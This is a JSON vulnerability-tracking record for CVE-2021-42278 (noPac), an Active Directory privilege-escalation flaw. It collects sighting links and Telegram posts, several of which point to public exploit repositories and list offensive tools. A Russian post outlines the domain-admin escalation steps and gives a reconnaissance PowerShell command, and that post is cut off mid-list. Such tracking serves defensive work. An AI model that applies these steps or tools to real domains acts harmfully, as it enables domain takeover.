{"vulnerability": "CVE-2021-42278", "sightings": [{"uuid": "6cec10cd-1b2a-48df-bed7-4420a44f6891", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "MISP/99138053-ae5d-4bcf-b2f8-0954edb204bc", "content": "", "creation_timestamp": "2022-11-01T20:54:34.000000Z"}, {"uuid": "bb17bc79-8adb-4f82-a1be-07a2a2ade403", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "MISP/095ab3f1-cbae-4b5c-8534-34d42a458aa5", "content": "", "creation_timestamp": "2022-05-12T16:19:54.000000Z"}, {"uuid": "89c90c04-4155-4c19-93b0-373aebcf9f56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "MISP/aaf97b2c-ad16-4ce6-928a-a440112d0fd3", "content": "", "creation_timestamp": "2024-09-16T19:13:31.000000Z"}, {"uuid": "71925ffc-b224-45bd-8120-b640c68fe594", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2023-06-14T21:10:04.000000Z"}, {"uuid": "8c1b6d61-b01a-4d9a-8903-212e949e2fe6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2971506", "content": "", "creation_timestamp": "2024-12-24T20:30:20.615736Z"}, {"uuid": "57d09e2b-ebe5-4a51-9911-a7de0a8e6d46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": 
"published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1242", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aDetection script for CVE-2021-42278 and CVE-2021-42287\nURL\uff1ahttps://github.com/cybersecurityworks553/noPac-detection", "creation_timestamp": "2021-12-27T13:13:28.000000Z"}, {"uuid": "b89f3302-8567-4a8c-9054-7e16507f39be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:32.000000Z"}, {"uuid": "2c76acc1-604d-46df-a928-81f9b204834e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2021-42278", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/58d684a4-6004-4cad-8944-7854b924424e", "content": "", "creation_timestamp": "2026-02-02T12:27:52.574993Z"}, {"uuid": "083e4900-1c70-4d29-902b-5987c9a4ee62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://bsky.app/profile/hackingne.ws/post/3li5i54s5sp2p", "content": "", "creation_timestamp": "2025-02-14T15:06:50.991610Z"}, {"uuid": "2d69760f-d53a-4a9a-b124-5da3ad1fc10f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-7358d820-9e7295ee585c5d83", "content": "", "creation_timestamp": "2025-04-30T17:58:26.811833Z"}, {"uuid": "ac2f23fc-6cba-4d0e-a639-d01c67d5956d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 
"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://gist.github.com/strikoder/99635df00444bbf5fc90ca83ec8051a0", "content": "", "creation_timestamp": "2025-12-01T12:02:42.000000Z"}, {"uuid": "8c0fddd8-e5bd-4bf3-a11c-8572cb67cf1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/fdda4963-0aa7-4d15-8a8f-969db8f304ca", "content": "", "creation_timestamp": "2025-02-28T23:49:13.272798Z"}, {"uuid": "63761362-71b8-4be0-853e-33e31881a2ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1009", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aExploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user \nURL\uff1ahttps://github.com/Ridter/noPac", "creation_timestamp": "2021-12-13T10:29:48.000000Z"}, {"uuid": "13d7f757-97ad-42b9-ba3d-246b93fe0075", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/952", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-42287/CVE-2021-42278 Scanner &amp; Exploiter.\nURL\uff1ahttps://github.com/cube0x0/noPac", "creation_timestamp": "2021-12-11T19:44:35.000000Z"}, {"uuid": "454dcc35-104c-4d52-b92f-754b122b6d53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", 
"type": "seen", "source": "https://t.me/habr_com_news/2245", "content": "\u200bMicrosoft \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0430 \u043e \u0431\u0430\u0433\u0430\u0445 Active Directory, \u0441 \u043a\u043e\u0442\u043e\u0440\u044b\u043c\u0438 \u0432\u043e\u0437\u043c\u043e\u0436\u0435\u043d \u0437\u0430\u0445\u0432\u0430\u0442 \u0434\u043e\u043c\u0435\u043d\u0430 Windows\n\n9 \u043d\u043e\u044f\u0431\u0440\u044f 2021 \u0433\u043e\u0434\u0430 \u0431\u044b\u043b\u0438 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u044b 2 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438: CVE-2021-42278 \u0438 CVE-2021-42287, \u0430 12 \u0434\u0435\u043a\u0430\u0431\u0440\u044f \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u0430 \u0441\u0445\u0435\u043c\u0430 \u0432\u0437\u043b\u043e\u043c\u0430. \u042d\u0442\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0441\u0432\u044f\u0437\u043a\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u0438\u0442\u044c \u0440\u043e\u043b\u044c \u0434\u043e\u043c\u0435\u043d-\u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430 \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u043e\u043b\u043d\u044b\u0439 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0434\u043e\u043c\u0435\u043d\u043e\u043c. 
20 \u0434\u0435\u043a\u0430\u0431\u0440\u044f Microsoft \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c \u043f\u043e \u043d\u0430\u0445\u043e\u0436\u0434\u0435\u043d\u0438\u044e \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043e\u0432.\n\n#Microsoft #Windows #\u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c", "creation_timestamp": "2021-12-22T04:19:44.000000Z"}, {"uuid": "9f4a5bc9-2e67-46c6-ba5c-e51073eed620", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1021", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aExploiting CVE-2021-42278 and CVE-2021-42287\nURL\uff1ahttps://github.com/waterrr/noPac", "creation_timestamp": "2021-12-13T15:27:32.000000Z"}, {"uuid": "d2cc44b9-1e41-466a-832b-ac82fb93a564", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/cKure/8415", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 noPac: CVE-2021-42287/CVE-2021-42278 Scanner &amp; Exploiter. 
Yet another low effort domain user to domain admin exploit.\nIf a Domain Controller is vulnerable it will return a TGT without a PAC, all eyes on small size tickets.\n\nhttps://github.com/cube0x0/noPac", "creation_timestamp": "2021-12-13T18:21:34.000000Z"}, {"uuid": "0a9694fd-95f0-4a5f-a0ca-62243b38a18e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/NinjaSec/348", "content": "Offensive Security (for exams like OSCP, OSWE, OSEP, etc.). \n\n\nPowerful Offensive Security Tools\n\n1. DeathStar \u2013 Automated AD privilege escalation\nhttps://github.com/byt3bl33d3r/DeathStar\n\n\n2. Frogger \u2013 Lateral movement visualizer for BloodHound\nhttps://github.com/FSecureLABS/Frogger\n\n\n3. InSpy \u2013 LinkedIn-based OSINT tool for target enumeration\nhttps://github.com/leapsecurity/InSpy\n\n\n4. NoPac-Tool \u2013 Exploits CVE-2021-42287 &amp; CVE-2021-42278 (Kerberos)\nhttps://github.com/Ridter/noPac\n\n\n5. LaZagne \u2013 Credential recovery from local machines\nhttps://github.com/AlessandroZ/LaZagne\n\n\n6. Egress-Assess \u2013 Test outbound firewall egress rules\nhttps://github.com/FortyNorthSecurity/Egress-Assess\n\n\n7. SessionGopher \u2013 Gathers saved session data\nhttps://github.com/fireeye/SessionGopher\n\n\n8. RustScan \u2013 Lightning-fast modern port scanner\nhttps://github.com/RustScan/RustScan\n\n\n9. Grouper2 \u2013 Active Directory ACL auditing\nhttps://github.com/l0ss/Grouper2\n\n\n10. ADACLScanner \u2013 Find misconfigured ACLs in AD\nhttps://github.com/canix1/ADACLScanner\n\n\n11. CredNinja \u2013 Brute-forces AD credentials over SMB\nhttps://github.com/byt3bl33d3r/CredNinja\n\n\n12. PetitPotam \u2013 Coerce NTLM authentication via MS-EFSRPC\nhttps://github.com/topotam/PetitPotam\n\n\n13. 
ZAP CLI \u2013 Command-line tool for OWASP ZAP automation\nhttps://github.com/Grunny/zap-cli\n\n\n14. Brutespray \u2013 Combines Nmap and Hydra for bruteforcing\nhttps://github.com/x90skysn3k/brutespray\n\n\n15. Chankro \u2013 DLL sideloading helper tool\nhttps://github.com/ivan-sincek/chankro\n\n\n16. 0d1n \u2013 Web application brute-forcing tool\nhttps://github.com/danielmiessler/0d1n\n\n\n17. Silenthound \u2013 BloodHound alternative using .NET\nhttps://github.com/dievus/silenthound\n\n\n18. LDAPDomainDump \u2013 Dumps Active Directory info via LDAP\nhttps://github.com/dirkjanm/ldapdomaindump\n\n\n19. SharpView \u2013 AD enumeration using C# (OPSEC-safe alternative to PowerView)\nhttps://github.com/tevora-threat/SharpView\n\n\n20. SharpHound.ps1 \u2013 Standalone version for stealthier BloodHound collection\nhttps://github.com/BloodHoundAD/BloodHound\n\n\n21. Nishang \u2013 PowerShell for offensive use\nhttps://github.com/samratashok/nishang\n\n\n22. PowerSharpPack \u2013 Collection of PowerShell offensive tools\nhttps://github.com/S3cur3Th1sSh1t/PowerSharpPack\n\n\n23. EvilClippy \u2013 Weaponize MS Office documents\nhttps://github.com/outflanknl/EvilClippy\n\n\n24. PSAttack \u2013 PowerShell attack toolkit\nhttps://github.com/jaredhaight/PSAttack\n\n\n25. 
Praeda \u2013 Collects sensitive info from embedded devices\nhttps://github.com/percx/Praeda\n\n\n#HackersFactory", "creation_timestamp": "2025-06-20T22:08:37.000000Z"}, {"uuid": "28bc6665-bca3-4408-82c8-bf4ed165e61e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1116", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aExploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user \nURL\uff1ahttps://github.com/WazeHell/sam-the-admin", "creation_timestamp": "2021-12-16T14:49:25.000000Z"}, {"uuid": "387f7a84-731a-4477-8b96-76b7dafef3b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/b4ckc0nn3ct/31", "content": "#activedirectory #ad #pentest #windows\nSAM THE ADMIN\n\u041f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 \u0434\u043e\u043c\u0435\u043d\u0435\n\u0423\u0441\u043b\u043e\u0432\u0438\u044f \u0434\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0430\u0442\u0430\u043a\u0438:\n1. \u041e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435 \u043f\u0430\u0442\u0447\u0430 \u043d\u0430 CVE-2021-42278\n2. 
\u0423\u0447\u0435\u0442\u043a\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0441 \u043f\u0440\u0430\u0432\u043e\u043c \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u043e\u0432 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430\n\nhttps://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html\n\n\u0414\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c Pachine\n\u0410\u043b\u044c\u0442\u0435\u0440\u043d\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b:\nnoPac.py\nnoPac.exe\nsam-the-admin", "creation_timestamp": "2023-05-21T04:48:36.000000Z"}, {"uuid": "e2ffcfce-e7e6-495c-970d-cdb2458e3af5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/poxek/2766", "content": "Domain Admin in a few seconds (CVE-2021-42278 | CVE-2021-42287)\n\n\u0422\u0430\u043a\u043e\u0439 \u0441\u043f\u043e\u0441\u043e\u0431 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u0443\u0436\u0435 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u043f\u043e\u0447\u0442\u0438 \u0434\u0432\u0430 \u0433\u043e\u0434\u0430, \u043e\u0434\u043d\u0430\u043a\u043e \u044d\u0442\u043e\u0442 \u0441\u043f\u043e\u0441\u043e\u0431 \u0430\u043a\u0442\u0443\u0430\u043b\u0435\u043d \u0438 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0439. \u0410 \u043a\u0430\u043a\u0438\u0435 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u044b \u043e\u043d\u043e \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442?\n\n1. 
\u041f\u043e \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u0443 \u0432 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430\u0445, \u043e\u0431\u044b\u0447\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0434\u043e\u043c\u0435\u043d\u0430 \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0441\u043e\u0435\u0434\u0438\u043d\u0438\u0442\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440 \u043a AD \u0442\u043e\u043b\u044c\u043a\u043e 10 \u0440\u0430\u0437. \n\u0427\u0442\u043e\u0431\u044b \u044d\u0442\u043e \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c, \u043c\u043e\u0436\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0443\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u0443:\n\nGet-ADObject -Identity (Get-ADDomain).DistinguishedName -Properties ms-DS-MachineAccountQuota\n\n\u0427\u0442\u043e\u0431\u044b \u043e\u0442\u043b\u0438\u0447\u0430\u0442\u044c \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0437\u0430\u043f\u0438\u0441\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043e\u0442 \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043e\u0432, \u043e\u043d\u0438 \u0434\u043e\u043b\u0436\u043d\u044b \u0438\u043c\u0435\u0442\u044c \u0432 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0435 sAMAccountName \u043d\u0430 \u043a\u043e\u043d\u0446\u0435 $. \u041e\u0434\u043d\u0430\u043a\u043e \u043f\u0440\u0438\u043a\u043e\u043b \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u044d\u0442\u043e\u0442 \u0441\u0438\u043c\u0432\u043e\u043b \u043d\u0435 \u0432\u0441\u0435\u0433\u0434\u0430 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442\u0441\u044f. 
\u0410\u0442\u0440\u0438\u0431\u0443\u0442\u043e\u043c \u0438\u043c\u0435\u043d\u0438 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f sAMAccountName. \u042d\u0442\u043e\u0442 \u0430\u0442\u0440\u0438\u0431\u0443\u0442 \u043c\u043e\u0436\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u0438 \u043e\u0442\u0440\u0435\u0434\u0430\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0432\u0440\u0443\u0447\u043d\u0443\u044e \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e ADSIEdit Tool\n\n2. \u041f\u0440\u0438 \u0437\u0430\u043f\u0440\u043e\u0441\u0435 \u0431\u0438\u043b\u0435\u0442\u0430 \u043d\u0430 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0435 \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043f\u0440\u0435\u0434\u044a\u044f\u0432\u0438\u0442\u044c TGT. \u0415\u0441\u043b\u0438 \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u043c\u044b\u0439 \u0431\u0438\u043b\u0435\u0442 \u043d\u0435 \u043d\u0430\u0439\u0434\u0435\u043d KDC, KDC \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u043f\u043e\u0432\u0442\u043e\u0440\u043d\u044b\u0439 \u043f\u043e\u0438\u0441\u043a \u0441 \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c $. 
\u0415\u0441\u043b\u0438 TGT \u043f\u043e\u043b\u0443\u0447\u0435\u043d \u0434\u043b\u044f username, \u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c username \u0443\u0434\u0430\u043b\u0435\u043d, \u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u044d\u0442\u043e\u0442 TGT \u0434\u043b\u044f \u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u0441\u0435\u0440\u0432\u0438\u0441\u043d\u043e\u0433\u043e \u0431\u0438\u043b\u0435\u0442\u0430 \u0434\u043b\u044f \u0434\u0440\u0443\u0433\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0447\u0435\u0440\u0435\u0437  S4U2self  \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u0442 \u043a \u0442\u043e\u043c\u0443, \u0447\u0442\u043e KDC \u0431\u0443\u0434\u0435\u0442 \u0438\u0441\u043a\u0430\u0442\u044c username$ \u0432 AD. \n\n\u041e\u0431\u044a\u0435\u0434\u0438\u043d\u044f\u044f \u044d\u0442\u0438 \u0432\u0443\u043b\u043d\u044b, \u043c\u044b \u0438\u043c\u0435\u0435\u043c \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e \u0442\u0430\u043a\u043e\u0439 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439\n\n\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442 TGT. \u0417\u0430\u0442\u0435\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043f\u044b\u0442\u0430\u0442\u044c\u0441\u044f \u0443\u0434\u0430\u043b\u0438\u0442\u044c \u0438\u043b\u0438 \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u0442\u044c \u0438\u0441\u0445\u043e\u0434\u043d\u0443\u044e \u0443\u0447\u0435\u0442\u043d\u0443\u044e \u0437\u0430\u043f\u0438\u0441\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430. 
\u041f\u043e\u043b\u0443\u0447\u0438\u0432 TGT, \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u043d\u0430\u0447\u0430\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c sAMAccountName. \u0410 \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u0437\u043d\u0430\u044f, \u0447\u0442\u043e KDC \u043f\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0442\u0438\u043a\u0435\u0442\u044b \u0438 \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0435 \u0441\u0435\u0430\u043d\u0441\u043e\u0432\u044b\u0435 \u043a\u043b\u044e\u0447\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430\u043c \u0432 \u0434\u043e\u043c\u0435\u043d\u0435, \u043c\u044b \u044d\u0442\u043e \u043c\u043e\u0436\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439\n\n\u0421\u0446\u0435\u043d\u0430\u0440\u0438\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u0442\u0430\u043a:\n\n1. \u0412 \u0434\u043e\u043c\u0435\u043d \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u043e\u0432\u0430\u044f \u0443\u0447\u0435\u0442\u043d\u0430\u044f \u0437\u0430\u043f\u0438\u0441\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430.\n2. 
\u0421\u043e\u0437\u0434\u0430\u043d\u043d\u0430\u044f \u0443\u0447\u0435\u0442\u043d\u0430\u044f \u0437\u0430\u043f\u0438\u0441\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0438\u0438 \u0441 \u0438\u043c\u0435\u043d\u0435\u043c \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0433\u043e \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430\n3. \u0417\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442\u0441\u044f Kerberos TGT \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0438\u043c\u0435\u043d\u0438 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430.\n4. \u0421\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u0435 \u0438\u043c\u044f \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u0441\u043d\u043e\u0432\u0430 \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u0438\u0441\u0445\u043e\u0434\u043d\u043e\u0435  \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435.\n5. 
